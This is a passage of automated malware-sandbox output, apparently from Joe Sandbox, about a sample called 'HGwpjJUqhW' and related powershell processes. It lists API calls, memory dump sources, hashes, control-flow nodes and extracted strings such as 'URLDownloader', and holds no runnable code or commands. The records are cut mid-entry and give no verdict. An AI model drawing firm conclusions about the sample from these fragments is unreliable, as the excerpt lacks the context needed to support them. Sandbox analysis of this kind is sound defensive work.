                                                                                                                            • Instruction Fuzzy Hash: 88F0C975900628DFE746DF58D8C8E957BA8FB4D394B06C069FA0987322CB34EA50CB95
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 02624ECE
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 02624F28
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02624F40
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 02624F8C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 626452242-0
                                                                                                                            • Opcode ID: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                                                            • Instruction ID: 9a0447495f07f0cc5752a89e4e10452399c9de053c04902a82ddabfd36863a8f
                                                                                                                            • Opcode Fuzzy Hash: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                                                            • Instruction Fuzzy Hash: 9831D1B5E40208BBEB14DBD8CD86FAEB7B5EB48710F244258F615AB2C0D671AA008F55
                                                                                                                            APIs
                                                                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10017B76,000000FF,?,10013642,?), ref: 10013A90
                                                                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10017B76,000000FF,?,10013642), ref: 10013AAB
                                                                                                                            • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,10013642,?), ref: 10013ADF
                                                                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 10013B57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1566052064-0
                                                                                                                            • Opcode ID: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                                                            • Instruction ID: 47359edd55c6cc15742bff4ced4580a4001c133a1fe49908c7c5117e5c40c52a
                                                                                                                            • Opcode Fuzzy Hash: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                                                            • Instruction Fuzzy Hash: DD3141B4D00259DFDB04DF94D981BEEBBB4FF48310F208659E52667391DB34AA84CBA1
                                                                                                                            APIs
                                                                                                                            • __RTC_Initialize.LIBCMT ref: 10016409
                                                                                                                              • Part of subcall function 10016CAE: InitializeSListHead.KERNEL32(1001C360,10016413,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016CB3
                                                                                                                            • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182EC,100182F0,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016422
                                                                                                                            • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182CC,100182E8,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016440
                                                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10016473
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 590286634-0
                                                                                                                            • Opcode ID: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                                                            • Instruction ID: e11346addbbd0b20877a0dd20a8321200fe6c64d5ca488d70c2580f7c5b0b6f1
                                                                                                                            • Opcode Fuzzy Hash: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                                                            • Instruction Fuzzy Hash: 0C212439544215ABEF01DBB49C027DD37A1EF0E3A4F108009F5966F1C2CB32E6C5C6AA
                                                                                                                            APIs
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F5D
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F6A
                                                                                                                            • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F75
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2950233615-0
                                                                                                                            • Opcode ID: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                                                            • Instruction ID: d4953d2e9632dab8d67af48db5b56fd773fcfbd27f84caad3cc3cb56b92c495c
                                                                                                                            • Opcode Fuzzy Hash: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                                                            • Instruction Fuzzy Hash: FA110D74E00119EFCB58DFA4D9959EDB7B5FF48200B1181A9E805AB351EB30EF45DB90
                                                                                                                            APIs
                                                                                                                            • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,10012136), ref: 10012C3A
                                                                                                                            • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C4D
                                                                                                                            • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C5C
                                                                                                                            • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(100120FA,100120FA,100120F9,?,10012136), ref: 10012C80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3089488326-0
                                                                                                                            • Opcode ID: 31da55f76b99386bfca52db2829809a8af7d29f5ef04e72f75014f1d39d39b3f
                                                                                                                            • Instruction ID: 718b455e6a9fe28b5531d214fab6855221ed4fdccad38d515428ce19cb46a070
                                                                                                                            • Opcode Fuzzy Hash: 31da55f76b99386bfca52db2829809a8af7d29f5ef04e72f75014f1d39d39b3f
                                                                                                                            • Instruction Fuzzy Hash: 97F0AF74901108EFCB48DF98CD9599EB7B6FF48305B20819AE406A3351DB31AF15DB54
                                                                                                                            APIs
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 02636BDD
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02636BEC
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02636BF5
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 02636C02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                                            • Instruction ID: 6b5b90a3d804e5009f3a100d95e0ac76ac391a824cc924ed74941b345312ade6
                                                                                                                            • Opcode Fuzzy Hash: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                                            • Instruction Fuzzy Hash: 2CF05F74D1021DEBDB41DBB4CA8999EBBF4EF1C204BA18695E412E6110E630AB489B50
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10005573
                                                                                                                            • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 10005672
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
                                                                                                                            • String ID: .exe
                                                                                                                            • API String ID: 2188046178-4119554291
                                                                                                                            • Opcode ID: c8dc7b2a76f962d9c9e5e2295d0bb392a2ad8b6eac705aa3666f7bffbb178c74
                                                                                                                            • Instruction ID: 322e95b2db96aea7f088eda3d8bee12a526519093e635f9f9e857dc9ab2affb0
                                                                                                                            • Opcode Fuzzy Hash: c8dc7b2a76f962d9c9e5e2295d0bb392a2ad8b6eac705aa3666f7bffbb178c74
                                                                                                                            • Instruction Fuzzy Hash: 15513774C04248EFEB15CBA4CC91BEEBBB5EF15300F148199E1167B296DB746B48CBA1
                                                                                                                            APIs
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(1001C31C,?,URLDownloader,?,100015AC,1001C6D4), ref: 10015F8D
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015AC,1001C6D4), ref: 10015FC7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireRelease
                                                                                                                            • String ID: URLDownloader
                                                                                                                            • API String ID: 17069307-1891997712
                                                                                                                            • Opcode ID: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                                                            • Instruction ID: 6adcf340ed2f6481699652d891028e0f11606ccd9733c9b7c4ba67a8641b8b52
                                                                                                                            • Opcode Fuzzy Hash: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                                                            • Instruction Fuzzy Hash: 24F08234500618DFD310DF18C884E1977A4EB49676F15423DE9698F291C731D982CA52

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:8.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:3
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 20630 8206838 20631 820687b SetThreadToken 20630->20631 20632 82068a9 20631->20632

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 374 c6b490-c6b4a9 375 c6b4ae-c6b7f5 call c6acbc 374->375 376 c6b4ab 374->376 376->375
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: {Yq^$Yq^
                                                                                                                            • API String ID: 0-1785448187
                                                                                                                            • Opcode ID: 3f8ffb4af5d49b611e1a602bc67c6b6c638c70608a789d9629714f8b4eb4bd41
                                                                                                                            • Instruction ID: 5708bc0fe39f570cb90ac578f69a2aaa93c3c047432c24f9920ad5b655dfe5d2
                                                                                                                            • Opcode Fuzzy Hash: 3f8ffb4af5d49b611e1a602bc67c6b6c638c70608a789d9629714f8b4eb4bd41
                                                                                                                            • Instruction Fuzzy Hash: CA919AB1B006185BDB29EFB4C4156AFB7E2DF84704B04892DD50AAB350DF756E0A8BC6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$J8l$J8l$J8l$J8l$J8l$J8l$r7l$r7l
                                                                                                                            • API String ID: 0-3971769975
                                                                                                                            • Opcode ID: 971bd557004f58bbfaf03797489610a899f594dea32074508ac4fac6fd0aecf1
                                                                                                                            • Instruction ID: b7c8ab9b86ca4bacb6e093263e37886367096eafc15c8dbc79f01b636d6be94e
                                                                                                                            • Opcode Fuzzy Hash: 971bd557004f58bbfaf03797489610a899f594dea32074508ac4fac6fd0aecf1
                                                                                                                            • Instruction Fuzzy Hash: ED2227B1B0020AEFCB648FA8D4406AABBE6BFC6310F14817AE515DB251DB35DD45CBA1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                            • API String ID: 0-1420252700
                                                                                                                            • Opcode ID: 28d025a2b52b9feef6a5ca08d78765fc6bfb9e398235cfc605ccbb59494239f9
                                                                                                                            • Instruction ID: e7299b9085cee2ef252e45cd65c52d0ae13691f6d8cc2b6a8e4c61a1cf993e07
                                                                                                                            • Opcode Fuzzy Hash: 28d025a2b52b9feef6a5ca08d78765fc6bfb9e398235cfc605ccbb59494239f9
                                                                                                                            • Instruction Fuzzy Hash: 741269B5B04286AFCB658BBC981166AFFE2AF81310F14C5BAE501CB351DB71DC45CBA1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 438 8206837-8206873 440 820687b-82068a7 SetThreadToken 438->440 441 82068b0-82068cd 440->441 442 82068a9-82068af 440->442 442->441
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1725826599.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_8200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3254676861-0
                                                                                                                            • Opcode ID: 803476e73193d9e45faa05a85524da4a07250b566a9b619d80a3802d62fe7aff
                                                                                                                            • Instruction ID: 0e383ff48f4beb4ef45a2bca4e8cab265a75c4807eeed124f4d6a33a2bd5ad87
                                                                                                                            • Opcode Fuzzy Hash: 803476e73193d9e45faa05a85524da4a07250b566a9b619d80a3802d62fe7aff
                                                                                                                            • Instruction Fuzzy Hash: 0D1125B59003098FCB10DF9AC544BDEFFF8EB48320F24841AD558A7250D775A944CFA5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 445 8206838-82068a7 SetThreadToken 447 82068b0-82068cd 445->447 448 82068a9-82068af 445->448 448->447
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1725826599.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_8200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3254676861-0
                                                                                                                            • Opcode ID: 110196c0e92df75728f5e38528a47fe440332cda77fd10007429622ecc2c6fd8
                                                                                                                            • Instruction ID: cc18e30cce7ad1aba1b6f0b1e97ad26342606665120ea89d2fba8f7e27cde04c
                                                                                                                            • Opcode Fuzzy Hash: 110196c0e92df75728f5e38528a47fe440332cda77fd10007429622ecc2c6fd8
                                                                                                                            • Instruction Fuzzy Hash: 0811F2B59003098FDB10DF9AC984B9EFBF8EB48324F24842AD558A7250D775A944CFA5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 451 c66fe0-c66fff 452 c67105-c67143 451->452 453 c67005-c67008 451->453 481 c6700a call c67697 453->481 482 c6700a call c6767c 453->482 455 c67010-c67022 456 c67024 455->456 457 c6702e-c67043 455->457 456->457 462 c670ce-c670e7 457->462 463 c67049-c67059 457->463 468 c670f2-c670f3 462->468 469 c670e9 462->469 466 c67065-c67073 call c6bf10 463->466 467 c6705b 463->467 473 c67079-c6707d 466->473 467->466 468->452 469->468 474 c6707f-c6708f 473->474 475 c670bd-c670c8 473->475 476 c67091-c670a9 474->476 477 c670ab-c670b5 474->477 475->462 475->463 476->475 477->475 481->455 482->455
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (bq
                                                                                                                            • API String ID: 0-149360118
                                                                                                                            • Opcode ID: f68cd24fecac365fa9eca509e5ed0b29d846dff6186368c998ada656d264e8ff
                                                                                                                            • Instruction ID: f73036dbab8464141bc134619b44746d6879ee1cdae2e7b1030a308c40848d43
                                                                                                                            • Opcode Fuzzy Hash: f68cd24fecac365fa9eca509e5ed0b29d846dff6186368c998ada656d264e8ff
                                                                                                                            • Instruction Fuzzy Hash: 80415F34B042048FDB24DF69C598AAEBBF2EF8D714F244599E406AB395CB35DD01CB60

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 483 c6e599-c6e61e 491 c6e624-c6e63b 483->491 492 c6e6a2-c6e6bb 483->492 497 c6e643-c6e6a0 491->497 495 c6e6c6 492->495 496 c6e6bd 492->496 498 c6e6c7 495->498 496->495 497->491 497->492 498->498
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: J8l
                                                                                                                            • API String ID: 0-97097960


                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (&^q
                                                                                                                            • API String ID: 0-2067289071

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: +/q^
                                                                                                                            • API String ID: 0-1558806512


                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 884166b17a31309711e65323bdccd9815f7221b790df25a627a3c370f46bc92b
                                                                                                                            • Instruction ID: e758ffbe86e8a327c0f44f222dbc70ad385da44252728f855757df987fdd824c
                                                                                                                            • Opcode Fuzzy Hash: 884166b17a31309711e65323bdccd9815f7221b790df25a627a3c370f46bc92b
                                                                                                                            • Instruction Fuzzy Hash: C0313131F081589FCB21AB79EC944FC7F71AF96321B2540A6E913DB662CA614D42C7B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0217b6a42dc16d4e4ce9db6fd7640a0fbe6c285014a271c6a05a6adec8b8dae8
                                                                                                                            • Instruction ID: 36ec9b0a1523fb95704e27a6914acd3e2867982b6d878f45f64f2385ea8c75ed
                                                                                                                            • Opcode Fuzzy Hash: 0217b6a42dc16d4e4ce9db6fd7640a0fbe6c285014a271c6a05a6adec8b8dae8
                                                                                                                            • Instruction Fuzzy Hash: DD317A313006009FC715EB78E894BAAB7D6EBC4354F04863AE60ACB365DF75A949CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 530143af05d24eaa7998c2c72c8028b7473ee52b9e06520a2e99738132873eaf
                                                                                                                            • Instruction ID: 3a4e77a664bb1eefe02bf32e40fd94c0c6aab41b9aaa6f22ccbe0e82f096200a
                                                                                                                            • Opcode Fuzzy Hash: 530143af05d24eaa7998c2c72c8028b7473ee52b9e06520a2e99738132873eaf
                                                                                                                            • Instruction Fuzzy Hash: 47315C35B041058FCB24CF65C598AAEBBF2EF8D315F244569E816AB365CB36DD02CB60
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cfe0d9b572d084fe825c42c45e0c6bc76c397f83608a2345abc316e4151a6b60
                                                                                                                            • Instruction ID: 28a08c15e063432cd5c0dad014e3747003ee3e5d12a6660682288f8222482eda
                                                                                                                            • Opcode Fuzzy Hash: cfe0d9b572d084fe825c42c45e0c6bc76c397f83608a2345abc316e4151a6b60
                                                                                                                            • Instruction Fuzzy Hash: D9314C70A002099FDB18DFB9D4957AEBBF6AF88310F148069F415E7354EA348D418F62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1007ee250d5cb0589034bf8b815b287d27503f14b837bb9e866783dd9bab5207
                                                                                                                            • Instruction ID: 9b9951c6e09ddcf7fd13f5ad4f9db599721452c0ff0501a0a05591862cdfa7d5
